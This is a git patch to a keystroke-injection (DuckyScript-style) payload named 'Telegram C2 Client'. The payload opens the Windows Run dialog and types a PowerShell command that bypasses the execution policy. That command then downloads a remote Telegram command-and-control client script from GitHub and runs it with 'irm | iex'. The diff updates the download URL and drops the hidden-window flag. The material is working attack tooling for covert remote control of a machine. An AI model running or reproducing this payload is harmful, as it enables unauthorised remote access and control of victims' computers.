From a49527211d9f283afbf2538ae0425858ff401bdb Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sat, 2 Dec 2023 00:38:35 +0000 Subject: [PATCH] Update Telegram C2 Client.txt --- Fast-Execution-Scripts/Telegram C2 Client.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fast-Execution-Scripts/Telegram C2 Client.txt b/Fast-Execution-Scripts/Telegram C2 Client.txt index 8344441..bc7fb34 100644 --- a/Fast-Execution-Scripts/Telegram C2 Client.txt +++ b/Fast-Execution-Scripts/Telegram C2 Client.txt @@ -21,7 +21,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NonI -NoP -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Command-and-Control/Telegram-C2-Client.ps1 | iex +STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex ENTER